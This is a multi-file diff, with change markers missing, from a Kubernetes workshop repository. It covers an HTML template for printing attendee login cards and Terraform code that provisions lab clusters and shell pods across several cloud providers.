width: 3.355in; /* 3.375in minus two 0.01in borders */
height: 2.105in; /* 2.125in minus two 0.01in borders */
/**/
width: 33%;
/**/
}
p {
margin: 0.8em;
}
div.front {
{% if image %}
background-image: url("{{ image }}");
background-repeat: no-repeat;
background-size: 1in;
background-position-x: 2.8in;
background-position-y: center;
{% endif %}
div.back {
border: 1px dotted grey;
}
span.scale {
white-space: nowrap;
white-space: nowrap;
}
img.logo {
height: 4.5em;
float: right;
}
img.bottom {
height: 2.5em;
display: block;
margin: 0.5em auto;
}
.qrcode img {
height: 5.8em;
padding: 1em 1em 0.5em 1em;
float: left;
width: 40%;
margin: 1em;
}
.logpass {
@@ -140,97 +189,101 @@ span.scale {
height: 0;
}
</style>
<script type="text/javascript" src="qrcode.min.js"></script>
<script type="text/javascript" src="https://cdn.rawgit.com/davidshimjs/qrcodejs/gh-pages/qrcode.min.js"></script>
<script type="text/javascript">
function qrcodes() {
[].forEach.call(
document.getElementsByClassName("qrcode"),
(e, index) => {
new QRCode(e, {
text: "{{ qrcode }}",
correctLevel: QRCode.CorrectLevel.L
});
}
);
[].forEach.call(
document.getElementsByClassName("qrcode"),
(e, index) => {
new QRCode(e, {
text: "{{ qrcode }}",
correctLevel: QRCode.CorrectLevel.L
});
}
);
}
function scale() {
[].forEach.call(
document.getElementsByClassName("scale"),
(e, index) => {
var text_width = e.getBoundingClientRect().width;
var box_width = e.parentElement.getBoundingClientRect().width;
var percent = 100 * box_width / text_width + "%";
e.style.fontSize = percent;
}
);
[].forEach.call(
document.getElementsByClassName("scale"),
(e, index) => {
var text_width = e.getBoundingClientRect().width;
var box_width = e.parentElement.getBoundingClientRect().width;
var percent = 100 * box_width / text_width + "%";
e.style.fontSize = percent;
}
);
}
</script>
</head>
<body onload="qrcodes(); scale();">
{% for login in logins %}
<div class="card front">
{% for cluster in clusters %}
<div>
<p>{{ intro }}</p>
<p>
{% if img_logo_src %}
<img class="logo" src="{{ img_logo_src }}" />
{% endif %}
<table>
<tr>
<td>login:</td>
<td>password:</td>
</tr>
<tr>
<td class="logpass">{{ login.login }}</td>
<td class="logpass">{{ login.password }}</td>
</tr>
<tr>
<td>IP address:</td>
{% if login.port %}
<td>port:</td>
{% endif %}
</tr>
<tr>
<td class="logpass">{{ login.ipaddrs.split("\t")[0] }}</td>
{% if login.port %}
<td class="logpass">{{ login.port }}</td>
{% endif %}
</tr>
{% if clusternumber != None %}
<tr><td>cluster:</td></tr>
<tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
{% endif %}
<tr><td>login:</td></tr>
<tr><td class="logpass">{{ user_login }}</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">{{ user_password }}</td></tr>
</table>
</p>
<p>
{{ listhead }}
<table>
{% for node in cluster %}
<tr>
<td>{{ clusterprefix }}{{ loop.index }}:</td>
<td>{{ node }}</td>
</tr>
{% endfor %}
</table>
</p>
<p>
{% if url %}
{{ slides_are_at }}
{{ slides_are_at }}
<p>
<span class="scale">{{ url }}</span>
</p>
{% endif %}
{% if img_bottom_src %}
<img class="bottom" src="{{ img_bottom_src }}" />
{% endif %}
</p>
</div>
{% if loop.index%pagesize==0 or loop.last %}
<span class="pagebreak"></span>
{% if backside %}
{% for x in range(pagesize) %}
<div class="card back">
{{ backside }}
{#
<p>Thanks for attending
"Getting Started With Kubernetes and Container Orchestration"
during CONFERENCE in Month YYYY!</p>
<p>If you liked that workshop,
I can train your team, in person or
online, with custom courses of
any length and any level.
</p>
{% if qrcode %}
<p>If you're interested, please scan that QR code to contact me:</p>
<span class="qrcode"></span>
{% for x in range(pagesize) %}
<div class="back">
<p>Thanks for attending
"Getting Started With Kubernetes and Container Orchestration"
during CONFERENCE in Month YYYY!</p>
<p>If you liked that workshop,
I can train your team, in person or
online, with custom courses of
any length and any level.
</p>
{% if qrcode %}
<p>If you're interested, please scan that QR code to contact me:</p>
<span class="qrcode"></span>
{% else %}
<p>If you're interested, you can contact me at:</p>
{% endif %}
<p>jerome.petazzoni@gmail.com</p>
#}
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
<p>If you're interested, you can contact me at:</p>
{% endif %}
<p>jerome.petazzoni@gmail.com</p>
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
{% endif %}
{% endfor %}
</body>

View File

@@ -1,19 +0,0 @@
cards_template: cards.html
paper_size: Letter
url: https://2024-11-qconsf.container.training
event: workshop
backside: |
<div class="qrcode"></div>
<p>
Thanks for attending the Asynchronous Architecture Patterns workshop at QCON!
</p>
<p>
<b>This QR code will give you my contact info</b> as well as a link to a feedback form.
</p>
<p>
If you liked this workshop, I can train your team, in person or online, with custom
courses of any length and any level, on Docker, Kubernetes, and MLops.
</p>
qrcode: https://2024-11-qconsf.container.training/#contact
thing: Kubernetes cluster
image: logo-kubernetes.png

View File

@@ -1,2 +0,0 @@
#!/bin/sh
exo zone

View File

@@ -8,8 +8,8 @@ resource "random_string" "_" {
resource "time_static" "_" {}
locals {
min_nodes_per_pool = var.min_nodes_per_cluster
max_nodes_per_pool = var.max_nodes_per_cluster
min_nodes_per_pool = var.nodes_per_cluster
max_nodes_per_pool = var.nodes_per_cluster * 2
timestamp = formatdate("YYYY-MM-DD-hh-mm", time_static._.rfc3339)
tag = random_string._.result
# Common tags to be assigned to all resources

View File

@@ -2,11 +2,7 @@ terraform {
required_providers {
kubernetes = {
source = "hashicorp/kubernetes"
version = "~> 2.38.0"
}
helm = {
source = "hashicorp/helm"
version = "~> 3.0"
version = "2.16.1"
}
}
}
@@ -18,20 +14,6 @@ provider "kubernetes" {
config_path = "./kubeconfig.${index}"
}
provider "helm" {
alias = "cluster_${index}"
kubernetes = {
config_path = "./kubeconfig.${index}"
}
}
# Password used for SSH and code-server access
resource "random_string" "shpod_${index}" {
length = 6
special = false
upper = false
}
resource "kubernetes_namespace" "shpod_${index}" {
provider = kubernetes.cluster_${index}
metadata {
@@ -39,53 +21,121 @@ resource "kubernetes_namespace" "shpod_${index}" {
}
}
data "kubernetes_service" "shpod_${index}" {
depends_on = [ helm_release.shpod_${index} ]
resource "kubernetes_deployment" "shpod_${index}" {
provider = kubernetes.cluster_${index}
metadata {
name = "shpod"
namespace = "shpod"
namespace = kubernetes_namespace.shpod_${index}.metadata.0.name
}
spec {
selector {
match_labels = {
app = "shpod"
}
}
template {
metadata {
labels = {
app = "shpod"
}
}
spec {
service_account_name = "shpod"
container {
image = "jpetazzo/shpod"
name = "shpod"
env {
name = "PASSWORD"
value = random_string.shpod_${index}.result
}
lifecycle {
post_start {
exec {
command = [ "sh", "-c", "curl http://myip.enix.org/REMOTE_ADDR > /etc/HOSTIP || true" ]
}
}
}
resources {
limits = {
cpu = "2"
memory = "500M"
}
requests = {
cpu = "100m"
memory = "250M"
}
}
}
}
}
}
}
resource "helm_release" "shpod_${index}" {
provider = helm.cluster_${index}
repository = "https://shpod.in"
chart = "shpod"
name = "shpod"
namespace = "shpod"
create_namespace = false
values = [
yamlencode({
service = {
type = "NodePort"
}
resources = {
requests = {
cpu = "100m"
memory = "500M"
}
limits = {
cpu = "1"
memory = "1000M"
}
}
persistentVolume = {
enabled = true
}
ssh = {
password = random_string.shpod_${index}.result
}
rbac = {
cluster = {
clusterRoles = [ "cluster-admin" ]
}
}
codeServer = {
enabled = true
}
})
]
resource "kubernetes_service" "shpod_${index}" {
provider = kubernetes.cluster_${index}
lifecycle {
# Folks might alter their shpod Service to expose extra ports.
# Don't reset their changes.
ignore_changes = [ spec ]
}
metadata {
name = "shpod"
namespace = kubernetes_namespace.shpod_${index}.metadata.0.name
}
spec {
selector = {
app = "shpod"
}
port {
name = "ssh"
port = 22
target_port = 22
}
type = "NodePort"
}
}
resource "kubernetes_service_account" "shpod_${index}" {
provider = kubernetes.cluster_${index}
metadata {
name = "shpod"
namespace = kubernetes_namespace.shpod_${index}.metadata.0.name
}
}
resource "kubernetes_cluster_role_binding" "shpod_${index}" {
provider = kubernetes.cluster_${index}
metadata {
name = "shpod"
}
role_ref {
api_group = "rbac.authorization.k8s.io"
kind = "ClusterRole"
name = "cluster-admin"
}
subject {
kind = "ServiceAccount"
name = "shpod"
namespace = "shpod"
}
subject {
api_group = "rbac.authorization.k8s.io"
kind = "Group"
name = "shpod-cluster-admins"
}
}
resource "random_string" "shpod_${index}" {
length = 6
special = false
upper = false
}
provider "helm" {
alias = "cluster_${index}"
kubernetes {
config_path = "./kubeconfig.${index}"
}
}
resource "helm_release" "metrics_server_${index}" {
@@ -100,75 +150,13 @@ resource "helm_release" "metrics_server_${index}" {
name = "metrics-server"
namespace = "metrics-server"
create_namespace = true
values = [
yamlencode({
args = [ "--kubelet-insecure-tls" ]
})
]
}
# As of October 2025, the ebs-csi-driver addon (which is used on EKS
# to provision persistent volumes) doesn't automatically create a
# StorageClass. Here, we're trying to detect the DaemonSet created
# by the ebs-csi-driver; and if we find it, we create the corresponding
# StorageClass.
data "kubernetes_resources" "ebs_csi_node_${index}" {
provider = kubernetes.cluster_${index}
api_version = "apps/v1"
kind = "DaemonSet"
label_selector = "app.kubernetes.io/name=aws-ebs-csi-driver"
namespace = "kube-system"
}
resource "kubernetes_storage_class" "ebs_csi_${index}" {
count = (length(data.kubernetes_resources.ebs_csi_node_${index}.objects) > 0) ? 1 : 0
provider = kubernetes.cluster_${index}
metadata {
name = "ebs-csi"
annotations = {
"storageclass.kubernetes.io/is-default-class" = "true"
}
set {
name = "args"
value = "{--kubelet-insecure-tls}"
}
storage_provisioner = "ebs.csi.aws.com"
}
# This section here deserves a little explanation.
#
# When we access a cluster with shpod (either through SSH or code-server)
# there is no kubeconfig file - we simply use "in-cluster" authentication
# with a ServiceAccount token. This is a bit unusual, and ideally, I would
# prefer to have a "normal" kubeconfig file in the students' shell.
#
# So what we're doing here, is that we're populating a ConfigMap with
# a kubeconfig file; and in the initialization scripts (e.g. bashrc) we
# automatically download the kubeconfig file from the ConfigMap and place
# it in ~/.kube/kubeconfig.
#
# But, which kubeconfig file should we use? We could use the "normal"
# kubeconfig file that was generated by the provider; but in some cases,
# that kubeconfig file might use a token instead of a certificate for
# user authentication - and ideally, I would like to have a certificate
# so that in the section about auth and RBAC, we can dissect that TLS
# certificate and explain where our permissions come from.
#
# So we're creating a TLS key pair; using the CSR API to issue a user
# certificate belonging to a special group; and granting the cluster-admin
# role to that group; then we use the kubeconfig file generated by the
# provider but override the user with that TLS key pair.
#
# This is not strictly necessary but it streamlines the lesson on auth.
#
# Lastly - in the ConfigMap we actually put both the original kubeconfig,
# and the one where we injected our new user (just in case we want to
# use or look at the original for any reason).
#
# One more thing: the kubernetes.io/kube-apiserver-client signer is
# disabled on EKS, so... we don't generate that ConfigMap on EKS.
# To detect if we're on EKS, we're looking for the ebs-csi-node DaemonSet.
# (Which means that the detection will break if the ebs-csi addon is missing.)
resource "kubernetes_config_map" "kubeconfig_${index}" {
count = (length(data.kubernetes_resources.ebs_csi_node_${index}.objects) > 0) ? 0 : 1
provider = kubernetes.cluster_${index}
metadata {
name = "kubeconfig"
@@ -194,7 +182,7 @@ resource "kubernetes_config_map" "kubeconfig_${index}" {
- name: cluster-admin
user:
client-key-data: $${base64encode(tls_private_key.cluster_admin_${index}.private_key_pem)}
client-certificate-data: $${base64encode(kubernetes_certificate_signing_request_v1.cluster_admin_${index}[0].certificate)}
client-certificate-data: $${base64encode(kubernetes_certificate_signing_request_v1.cluster_admin_${index}.certificate)}
EOT
}
}
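The initialization-script half of this mechanism (the bashrc step mentioned in the comment above) is not part of this diff. A minimal sketch of what it could look like, assuming the ConfigMap lives in the shpod namespace and stores the file under a kubeconfig data key:
# Sketch of the init-script step: copy the kubeconfig stored in the ConfigMap
# into the user's home directory (shpod authenticates in-cluster, so kubectl
# works here even before the kubeconfig file exists).
# Assumed names: namespace "shpod", data key "kubeconfig"; adjust as needed.
mkdir -p ~/.kube
kubectl --namespace shpod get configmap kubeconfig \
  --output "jsonpath={.data.kubeconfig}" > ~/.kube/kubeconfig
chmod 600 ~/.kube/kubeconfig
export KUBECONFIG=~/.kube/kubeconfig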
@@ -214,25 +202,7 @@ resource "tls_cert_request" "cluster_admin_${index}" {
}
}
resource "kubernetes_cluster_role_binding" "shpod_cluster_admin_${index}" {
provider = kubernetes.cluster_${index}
metadata {
name = "shpod-cluster-admin"
}
role_ref {
api_group = "rbac.authorization.k8s.io"
kind = "ClusterRole"
name = "cluster-admin"
}
subject {
api_group = "rbac.authorization.k8s.io"
kind = "Group"
name = "shpod-cluster-admins"
}
}
resource "kubernetes_certificate_signing_request_v1" "cluster_admin_${index}" {
count = (length(data.kubernetes_resources.ebs_csi_node_${index}.objects) > 0) ? 0 : 1
provider = kubernetes.cluster_${index}
metadata {
name = "cluster-admin"
@@ -247,28 +217,16 @@ resource "kubernetes_certificate_signing_request_v1" "cluster_admin_${index}" {
%{ endfor ~}
output "ips_txt" {
output "ip_addresses_of_nodes" {
value = join("\n", [
%{ for index, cluster in clusters ~}
join("\n", concat(
join("\t", concat(
[
random_string.shpod_${index}.result,
"ssh -l k8s -p $${kubernetes_service.shpod_${index}.spec[0].port[0].node_port}"
],
split(" ", file("./externalips.${index}"))
)),
%{ endfor ~}
""
])
}
output "logins_jsonl" {
value = join("\n", [
%{ for index, cluster in clusters ~}
jsonencode({
login = "k8s",
password = random_string.shpod_${index}.result,
port = data.kubernetes_service.shpod_${index}.spec[0].port[0].node_port,
codeServerPort = data.kubernetes_service.shpod_${index}.spec[0].port[1].node_port,
ipaddrs = replace(file("./externalips.${index}"), " ", "\t"),
}),
%{ endfor ~}
""
])
}

View File

@@ -7,23 +7,18 @@ variable "how_many_clusters" {
default = 2
}
variable "min_nodes_per_cluster" {
variable "nodes_per_cluster" {
type = number
default = 2
}
variable "max_nodes_per_cluster" {
type = number
default = 4
}
variable "node_size" {
type = string
default = "M"
}
variable "location" {
type = string
type = string
default = null
}

View File

@@ -1,45 +1,60 @@
data "aws_eks_cluster_versions" "_" {
default_only = true
# Taken from:
# https://github.com/hashicorp/learn-terraform-provision-eks-cluster/blob/main/main.tf
data "aws_availability_zones" "available" {}
module "vpc" {
source = "terraform-aws-modules/vpc/aws"
version = "3.19.0"
name = var.cluster_name
cidr = "10.0.0.0/16"
azs = slice(data.aws_availability_zones.available.names, 0, 3)
private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"]
public_subnets = ["10.0.4.0/24", "10.0.5.0/24", "10.0.6.0/24"]
enable_nat_gateway = true
single_nat_gateway = true
enable_dns_hostnames = true
public_subnet_tags = {
"kubernetes.io/cluster/${var.cluster_name}" = "shared"
"kubernetes.io/role/elb" = 1
}
private_subnet_tags = {
"kubernetes.io/cluster/${var.cluster_name}" = "shared"
"kubernetes.io/role/internal-elb" = 1
}
}
module "eks" {
source = "terraform-aws-modules/eks/aws"
version = "~> 21.0"
name = var.cluster_name
kubernetes_version = data.aws_eks_cluster_versions._.cluster_versions[0].cluster_version
vpc_id = local.vpc_id
subnet_ids = local.subnet_ids
endpoint_public_access = true
enable_cluster_creator_admin_permissions = true
upgrade_policy = {
# The default policy is EXTENDED, which incurs additional costs
# when running an old control plane. We don't advise to run old
# control planes, but we also don't want to incur costs if an
# old version is chosen accidentally.
support_type = "STANDARD"
}
source = "terraform-aws-modules/eks/aws"
version = "19.5.1"
cluster_name = var.cluster_name
cluster_version = "1.24"
vpc_id = module.vpc.vpc_id
subnet_ids = module.vpc.private_subnets
cluster_endpoint_public_access = true
eks_managed_node_group_defaults = {
ami_type = "AL2_x86_64"
addons = {
coredns = {}
eks-pod-identity-agent = {
before_compute = true
}
kube-proxy = {}
vpc-cni = {
before_compute = true
}
aws-ebs-csi-driver = {
service_account_role_arn = module.irsa-ebs-csi.iam_role_arn
}
}
eks_managed_node_groups = {
x86 = {
name = "x86"
one = {
name = "node-group-one"
instance_types = [local.node_size]
min_size = var.min_nodes_per_pool
max_size = var.max_nodes_per_pool
desired_size = var.min_nodes_per_pool
min_size = var.min_nodes_per_pool
max_size = var.max_nodes_per_pool
desired_size = var.min_nodes_per_pool
}
}
}
@@ -51,7 +66,7 @@ data "aws_iam_policy" "ebs_csi_policy" {
module "irsa-ebs-csi" {
source = "terraform-aws-modules/iam/aws//modules/iam-assumable-role-with-oidc"
version = "~> 5.39.0"
version = "4.7.0"
create_role = true
role_name = "AmazonEKSTFEBSCSIRole-${module.eks.cluster_name}"
@@ -60,9 +75,13 @@ module "irsa-ebs-csi" {
oidc_fully_qualified_subjects = ["system:serviceaccount:kube-system:ebs-csi-controller-sa"]
}
resource "aws_vpc_security_group_ingress_rule" "_" {
security_group_id = module.eks.node_security_group_id
cidr_ipv4 = "0.0.0.0/0"
ip_protocol = -1
description = "Allow all traffic to Kubernetes nodes (so that we can use NodePorts, hostPorts, etc.)"
resource "aws_eks_addon" "ebs-csi" {
cluster_name = module.eks.cluster_name
addon_name = "aws-ebs-csi-driver"
addon_version = "v1.5.2-eksbuild.1"
service_account_role_arn = module.irsa-ebs-csi.iam_role_arn
tags = {
"eks_addon" = "ebs-csi"
"terraform" = "true"
}
}

View File

@@ -1,8 +1,7 @@
terraform {
required_providers {
aws = {
source = "hashicorp/aws"
version = "~> 6.17.0"
source = "hashicorp/aws"
}
}
}

View File

@@ -1,61 +0,0 @@
# OK, we have two options here.
# 1. Create our own VPC
# - Pros: provides good isolation from other stuff deployed in the
# AWS account; makes sure that we don't interact with
# existing security groups, subnets, etc.
# - Cons: by default, there is a quota of 5 VPC per region, so
# we can only deploy 5 clusters
# 2. Use the default VPC
# - Pros/cons: the opposite :)
variable "use_default_vpc" {
type = bool
default = true
}
data "aws_vpc" "default" {
default = true
}
data "aws_subnets" "default" {
filter {
name = "vpc-id"
values = [data.aws_vpc.default.id]
}
}
data "aws_availability_zones" "available" {}
module "vpc" {
count = var.use_default_vpc ? 0 : 1
source = "terraform-aws-modules/vpc/aws"
version = "~> 6.0"
name = var.cluster_name
cidr = "10.0.0.0/16"
azs = slice(data.aws_availability_zones.available.names, 0, 3)
private_subnets = ["10.0.11.0/24", "10.0.12.0/24", "10.0.13.0/24"]
public_subnets = ["10.0.21.0/24", "10.0.22.0/24", "10.0.23.0/24"]
enable_nat_gateway = true
single_nat_gateway = true
enable_dns_hostnames = true
map_public_ip_on_launch = true
public_subnet_tags = {
"kubernetes.io/cluster/${var.cluster_name}" = "shared"
"kubernetes.io/role/elb" = 1
}
private_subnet_tags = {
"kubernetes.io/cluster/${var.cluster_name}" = "shared"
"kubernetes.io/role/internal-elb" = 1
}
}
locals {
vpc_id = var.use_default_vpc ? data.aws_vpc.default.id : module.vpc[0].vpc_id
subnet_ids = var.use_default_vpc ? data.aws_subnets.default.ids : module.vpc[0].public_subnets
}

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/azure/config.tf

View File

@@ -1,22 +0,0 @@
resource "azurerm_resource_group" "_" {
name = var.cluster_name
location = var.location
}
resource "azurerm_kubernetes_cluster" "_" {
name = var.cluster_name
location = var.location
dns_prefix = var.cluster_name
identity {
type = "SystemAssigned"
}
resource_group_name = azurerm_resource_group._.name
default_node_pool {
name = "x86"
node_count = var.min_nodes_per_pool
min_count = var.min_nodes_per_pool
max_count = var.max_nodes_per_pool
vm_size = local.node_size
enable_auto_scaling = true
}
}

View File

@@ -1,12 +0,0 @@
output "cluster_id" {
value = azurerm_kubernetes_cluster._.id
}
output "has_metrics_server" {
value = true
}
output "kubeconfig" {
value = azurerm_kubernetes_cluster._.kube_config_raw
sensitive = true
}

View File

@@ -1,7 +0,0 @@
terraform {
required_providers {
azurerm = {
source = "hashicorp/azurerm"
}
}
}

View File

@@ -1 +0,0 @@
../../providers/azure/variables.tf

View File

@@ -0,0 +1,12 @@
locals {
location = var.location != null ? var.location : "europe-north1-a"
region = replace(local.location, "/-[a-z]$/", "")
# Unfortunately, the following line doesn't work
# (that attribute just returns an empty string)
# so we have to hard-code the project name.
#project = data.google_client_config._.project
project = "prepare-tf"
}
data "google_client_config" "_" {}

View File

@@ -1,7 +1,7 @@
resource "google_container_cluster" "_" {
name = var.cluster_name
location = local.location
deletion_protection = false
name = var.cluster_name
project = local.project
location = local.location
#min_master_version = var.k8s_version
# To deploy private clusters, uncomment the section below,
@@ -42,7 +42,7 @@ resource "google_container_cluster" "_" {
node_pool {
name = "x86"
node_config {
tags = ["lab-${var.cluster_name}"]
tags = var.common_tags
machine_type = local.node_size
}
initial_node_count = var.min_nodes_per_pool
@@ -62,25 +62,3 @@ resource "google_container_cluster" "_" {
}
}
}
resource "google_compute_firewall" "_" {
name = "lab-${var.cluster_name}"
network = "default"
allow {
protocol = "tcp"
ports = ["0-65535"]
}
allow {
protocol = "udp"
ports = ["0-65535"]
}
allow {
protocol = "icmp"
}
source_ranges = ["0.0.0.0/0"]
target_tags = ["lab-${var.cluster_name}"]
}

View File

@@ -6,8 +6,6 @@ output "has_metrics_server" {
value = true
}
data "google_client_config" "_" {}
output "kubeconfig" {
sensitive = true
value = <<-EOT

View File

@@ -1 +0,0 @@
../../providers/googlecloud/provider.tf

View File

@@ -0,0 +1,8 @@
terraform {
required_providers {
google = {
source = "hashicorp/google"
version = "4.5.0"
}
}
}

View File

@@ -11,23 +11,17 @@ data "oci_containerengine_cluster_option" "_" {
locals {
compartment_id = oci_identity_compartment._.id
kubernetes_version = data.oci_containerengine_cluster_option._.kubernetes_versions[0]
images = [
for image in data.oci_containerengine_node_pool_option._.sources : image
if can(regex("OKE", image.source_name))
&& can(regex(substr(local.kubernetes_version, 1, -1), image.source_name))
&& !can(regex("GPU", image.source_name))
&& !can(regex("aarch64", image.source_name))
]
}
data "oci_identity_availability_domains" "_" {
compartment_id = local.compartment_id
}
data "oci_containerengine_node_pool_option" "_" {
compartment_id = local.compartment_id
node_pool_option_id = oci_containerengine_cluster._.id
data "oci_core_images" "_" {
compartment_id = local.compartment_id
operating_system = "Oracle Linux"
operating_system_version = "8"
shape = local.shape
}
resource "oci_containerengine_cluster" "_" {
@@ -62,7 +56,7 @@ resource "oci_containerengine_node_pool" "_" {
}
}
node_source_details {
image_id = local.images[0].image_id
image_id = data.oci_core_images._.images[0].id
source_type = "image"
}
}

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/ovh/config.tf

View File

@@ -1,18 +0,0 @@
resource "ovh_cloud_project_kube" "_" {
name = var.cluster_name
region = var.location
version = local.k8s_version
}
resource "ovh_cloud_project_kube_nodepool" "_" {
kube_id = ovh_cloud_project_kube._.id
name = "x86"
flavor_name = local.node_size
desired_nodes = var.min_nodes_per_pool
min_nodes = var.min_nodes_per_pool
max_nodes = var.max_nodes_per_pool
}
locals {
k8s_version = "1.26"
}

View File

@@ -1,12 +0,0 @@
output "cluster_id" {
value = ovh_cloud_project_kube._.id
}
output "has_metrics_server" {
value = false
}
output "kubeconfig" {
sensitive = true
value = ovh_cloud_project_kube._.kubeconfig
}

View File

@@ -1,7 +0,0 @@
terraform {
required_providers {
ovh = {
source = "ovh/ovh"
}
}
}

View File

@@ -1 +0,0 @@
../../providers/ovh/variables.tf

View File

@@ -1,23 +1,10 @@
resource "scaleway_vpc_private_network" "_" {
}
# This is a kind of hack to use a custom security group with Kapsule.
# See https://www.scaleway.com/en/docs/containers/kubernetes/reference-content/secure-cluster-with-private-network/
resource "scaleway_instance_security_group" "_" {
name = "kubernetes ${split("/", scaleway_k8s_cluster._.id)[1]}"
inbound_default_policy = "accept"
outbound_default_policy = "accept"
}
resource "scaleway_k8s_cluster" "_" {
name = var.cluster_name
name = var.cluster_name
#region = var.location
tags = var.common_tags
version = local.k8s_version
type = "kapsule"
cni = "cilium"
delete_additional_resources = true
private_network_id = scaleway_vpc_private_network._.id
}
resource "scaleway_k8s_pool" "_" {
@@ -30,7 +17,6 @@ resource "scaleway_k8s_pool" "_" {
max_size = var.max_nodes_per_pool
autoscaling = var.max_nodes_per_pool > var.min_nodes_per_pool
autohealing = true
depends_on = [scaleway_instance_security_group._]
}
data "scaleway_k8s_version" "_" {

View File

@@ -4,36 +4,24 @@ resource "helm_release" "_" {
create_namespace = true
repository = "https://charts.loft.sh"
chart = "vcluster"
version = "0.27.1"
values = [
yamlencode({
controlPlane = {
proxy = {
extraSANs = [ local.guest_api_server_host ]
}
service = {
spec = {
type = "NodePort"
}
}
statefulSet = {
persistence = {
volumeClaim = {
enabled = true
}
}
}
}
sync = {
fromHost = {
nodes = {
enabled = true
selector = {
all = true
}
}
}
}
})
]
set {
name = "service.type"
value = "NodePort"
}
set {
name = "storage.persistence"
value = "false"
}
set {
name = "sync.nodes.enabled"
value = "true"
}
set {
name = "sync.nodes.syncAllNodes"
value = "true"
}
set {
name = "syncer.extraArgs"
value = "{--tls-san=${local.guest_api_server_host}}"
}
}

View File

@@ -44,5 +44,5 @@ locals {
guest_api_server_port = local.node_port
guest_api_server_url_new = "https://${local.guest_api_server_host}:${local.guest_api_server_port}"
guest_api_server_url_old = yamldecode(local.kubeconfig_raw).clusters[0].cluster.server
kubeconfig = replace(local.kubeconfig_raw, local.guest_api_server_url_old, local.guest_api_server_url_new)
kubeconfig = replace(local.kubeconfig_raw, local.guest_api_server_url_old, local.guest_api_server_url_new)
}

View File

@@ -1,8 +0,0 @@
terraform {
required_providers {
helm = {
source = "hashicorp/helm"
version = "~> 3.0"
}
}
}

View File

@@ -1,8 +0,0 @@
terraform {
required_providers {
google = {
source = "hashicorp/google"
version = "~> 7.0"
}
}
}

View File

@@ -9,9 +9,5 @@ variable "node_sizes" {
variable "location" {
type = string
default = "europe-north1-a"
default = null
}
locals {
location = (var.location != "" && var.location != null) ? var.location : "europe-north1-a"
}

View File

@@ -14,9 +14,9 @@ $ hcloud server-type list | grep shared
variable "node_sizes" {
type = map(any)
default = {
S = "cpx11"
M = "cpx21"
L = "cpx31"
S = "cx11"
M = "cx21"
L = "cx31"
}
}

View File

@@ -1,13 +0,0 @@
variable "node_sizes" {
type = map(any)
default = {
S = "d2-4"
M = "d2-4"
L = "d2-8"
}
}
variable "location" {
type = string
default = "BHS5"
}

View File

@@ -1,30 +0,0 @@
variable "proxmox_endpoint" {
type = string
default = "https://localhost:8006/"
}
variable "proxmox_username" {
type = string
default = null
}
variable "proxmox_password" {
type = string
default = null
}
variable "proxmox_storage" {
type = string
default = "local"
}
variable "proxmox_template_node_name" {
type = string
default = null
}
variable "proxmox_template_vm_id" {
type = number
default = null
}

View File

@@ -1,11 +0,0 @@
# Since the node size needs to be a string...
# To indicate the number of CPUs and the amount of RAM, pass them as a single
# string with a space between them. RAM is in megabytes.
variable "node_sizes" {
type = map(any)
default = {
S = "1 2048"
M = "2 4096"
L = "3 8192"
}
}
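Purely as an illustration of that encoding (the Proxmox configuration that consumed these strings is not shown in this diff), splitting such a value into its two fields is straightforward, e.g. in bash:
# Illustrative only: split a "<cpus> <ram-in-MB>" size string into its fields.
NODE_SIZE="2 4096"   # e.g. the "M" entry above
read -r CPUS RAM_MB <<< "$NODE_SIZE"
echo "cores=$CPUS memory=${RAM_MB}MB"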

View File

@@ -1,5 +1,5 @@
provider "helm" {
kubernetes = {
kubernetes {
config_path = "~/kubeconfig"
}
}

View File

@@ -1,5 +1,5 @@
variable "node_sizes" {
type = map(any)
type = map(any)
default = {}
}

View File

@@ -56,7 +56,6 @@ locals {
cluster_name = format("%s-%03d", var.tag, cn[0])
node_name = format("%s-%03d-%03d", var.tag, cn[0], cn[1])
node_size = lookup(var.node_sizes, var.node_size, var.node_size)
node_index = cn[0] * var.nodes_per_cluster + cn[1]
}
}
}
@@ -72,10 +71,10 @@ resource "local_file" "ip_addresses" {
resource "local_file" "clusters" {
content = join("", formatlist("%s\n", [
for cid in range(1, 1 + var.how_many_clusters) :
join("\t",
join(" ",
[for nid in range(1, 1 + var.nodes_per_cluster) :
local.ip_addresses[format("c%03dn%03d", cid, nid)]
])]))
filename = "clusters.tsv"
filename = "clusters.txt"
file_permission = "0600"
}

View File

@@ -1 +0,0 @@
../common.tf

View File

@@ -1 +0,0 @@
../../providers/googlecloud/config.tf

View File

@@ -1,54 +0,0 @@
# Note: names and tags on GCP have to match a specific regex:
# (?:[a-z](?:[-a-z0-9]{0,61}[a-z0-9])?)
# In other words, they must start with a letter; but our names and tags
# usually start with a number (year-month-day-etc, so 2025-...),
# which is why we prefix them with "lab-" in this configuration.
resource "google_compute_instance" "_" {
for_each = local.nodes
zone = var.location
name = "lab-${each.value.node_name}"
tags = ["lab-${var.tag}"]
machine_type = each.value.node_size
boot_disk {
initialize_params {
image = "ubuntu-os-cloud/ubuntu-2404-lts-amd64"
}
}
network_interface {
network = "default"
access_config {}
}
metadata = {
"ssh-keys" = "ubuntu:${tls_private_key.ssh.public_key_openssh}"
}
}
locals {
ip_addresses = {
for key, value in local.nodes :
key => google_compute_instance._[key].network_interface[0].access_config[0].nat_ip
}
}
resource "google_compute_firewall" "_" {
name = "lab-${var.tag}"
network = "default"
allow {
protocol = "tcp"
ports = ["0-65535"]
}
allow {
protocol = "udp"
ports = ["0-65535"]
}
allow {
protocol = "icmp"
}
source_ranges = ["0.0.0.0/0"]
target_tags = ["lab-${var.tag}"]
}

View File

@@ -1 +0,0 @@
../../providers/googlecloud/provider.tf

View File

@@ -1 +0,0 @@
../../providers/googlecloud/variables.tf

View File

@@ -1,22 +1,14 @@
resource "openstack_compute_instance_v2" "_" {
for_each = local.nodes
name = each.value.node_name
image_name = data.openstack_images_image_v2._.name
image_name = var.image
flavor_name = each.value.node_size
key_pair = openstack_compute_keypair_v2._.name
key_pair = openstack_compute_keypair_v2._.name
network {
port = openstack_networking_port_v2._[each.key].id
}
}
data "openstack_images_image_v2" "_" {
most_recent = true
properties = {
os = "ubuntu"
version = "24.04"
}
}
resource "openstack_networking_port_v2" "_" {
